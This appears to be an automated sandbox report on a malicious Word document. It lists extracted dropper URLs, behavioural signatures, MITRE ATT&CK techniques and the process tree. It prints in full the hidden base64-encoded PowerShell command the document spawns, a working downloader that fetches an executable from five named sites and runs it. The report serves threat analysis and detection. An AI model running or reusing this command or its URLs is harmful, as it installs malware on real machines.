d219b73f42f9bf965c6e23207f6a9be2a68733f4663806ebf21dcef8078ff57a

General

Target

d219b73f42f9bf965c6e23207f6a9be2a68733f4663806ebf21dcef8078ff57a.doc
Sample

200128-xstze59lqs
SHA256

d219b73f42f9bf965c6e23207f6a9be2a68733f4663806ebf21dcef8078ff57a

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://healthbrate.com/wordpress/k3/

exe.dropper

https://plussizeforall.com/22s/H6e/

exe.dropper

https://swimsuitforwomens.com/wp-admin/xfa92/

exe.dropper

https://plussizeall.net/wp-admin/nn9x71f/

exe.dropper

https://makeupandbeautyguides.com/wp-admin/sva8/

Signatures

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4852 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4852 WINWORD.EXE

pid	process
4852	WINWORD.EXE

pid	process
4852	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2776	4944	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 2776 Powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

2776 Powershell.exe

description	pid	process
Token: SeDebugPrivilege	2776	Powershell.exe

pid	process
2776	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d219b73f42f9bf965c6e23207f6a9be2a68733f4663806ebf21dcef8078ff57a.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
- Enumerates system info in registry
PID:4852

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABNAHcAdwB4AHoAegBlAGoAZgB1AG4AdAA9ACcAWABwAHoAYQBuAHkAagB0AHkAYwBhAGYAJwA7ACQATQBvAGMAdgBoAGIAZABsACAAPQAgACcAMQA2ADcAJwA7ACQAVQBwAHQAawBtAGQAegB3AHMAeAByAD0AJwBUAHMAcQB0AHgAagB4AHMAYwBkAHkAJwA7ACQAVABmAGMAaQBxAHYAdABwAHcAcQBxAHkAeQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQATQBvAGMAdgBoAGIAZABsACsAJwAuAGUAeABlACcAOwAkAFQAeAB1AHcAdAB1AGUAdgBrAGYAPQAnAEUAbwB5AHMAZwBjAHYAbQB1ACcAOwAkAFAAaABkAGUAaABkAGsAdAA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAGUAYgBDAEwASQBFAG4AdAA7ACQARgBiAG8AdAB2AHoAaQB0AD0AJwBoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGIAcgBhAHQAZQAuAGMAbwBtAC8AdwBvAHIAZABwAHIAZQBzAHMALwBrADMALwAqAGgAdAB0AHAAcwA6AC8ALwBwAGwAdQBzAHMAaQB6AGUAZgBvAHIAYQBsAGwALgBjAG8AbQAvADIAMgBzAC8ASAA2AGUALwAqAGgAdAB0AHAAcwA6AC8ALwBzAHcAaQBtAHMAdQBpAHQAZgBvAHIAdwBvAG0AZQBuAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHgAZgBhADkAMgAvACoAaAB0AHQAcABzADoALwAvAHAAbAB1AHMAcwBpAHoAZQBhAGwAbAAuAG4AZQB0AC8AdwBwAC0AYQBkAG0AaQBuAC8AbgBuADkAeAA3ADEAZgAvACoAaAB0AHQAcABzADoALwAvAG0AYQBrAGUAdQBwAGEAbgBkAGIAZQBhAHUAdAB5AGcAdQBpAGQAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBzAHYAYQA4AC8AJwAuACIAUwBQAEwAYABJAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABMAGgAaAB1AGMAdgByAGwAdQA9ACcASgBiAGMAdgBlAHcAaAB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJABYAGQAcABoAHIAbABnAG4AdQBnAHYAIABpAG4AIAAkAEYAYgBvAHQAdgB6AGkAdAApAHsAdAByAHkAewAkAFAAaABkAGUAaABkAGsAdAAuACIARABPAHcATgBgAEwAYABPAEEAZABGAEkATABFACIAKAAkAFgAZABwAGgAcgBsAGcAbgB1AGcAdgAsACAAJABUAGYAYwBpAHEAdgB0AHAAdwBxAHEAeQB5ACkAOwAkAFcAbABzAHUAeQB6AHYAYgBkAGYAPQAnAFIAaQBvAGwAYQBiAHoAcwB0AHoAcQBlACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAVABmAGMAaQBxAHYAdABwAHcAcQBxAHkAeQApAC4AIgBMAEUAYABOAEcAVABoACIAIAAtAGcAZQAgADIANAAwADAANQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAHQAQQBgAFIAdAAiACgAJABUAGYAYwBpAHEAdgB0AHAAdwBxAHEAeQB5ACkAOwAkAEwAeQB5AGYAYgBxAHQAcAB3AHAAegA9ACcAVgBrAHIAbQBqAHAAagB0AGcAcwB3AGYAdAAnADsAYgByAGUAYQBrADsAJABYAHYAbwBwAGIAagBrAGQAZQBhAHAAZAA9ACcAUwB3AGIAeABkAHcAaQBoAGQAdgBwAG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgBjAGEAaQBhAGEAcgBhAGEAPQAnAE0AbABoAG0AbAB0AGwAbQAnAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2776

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads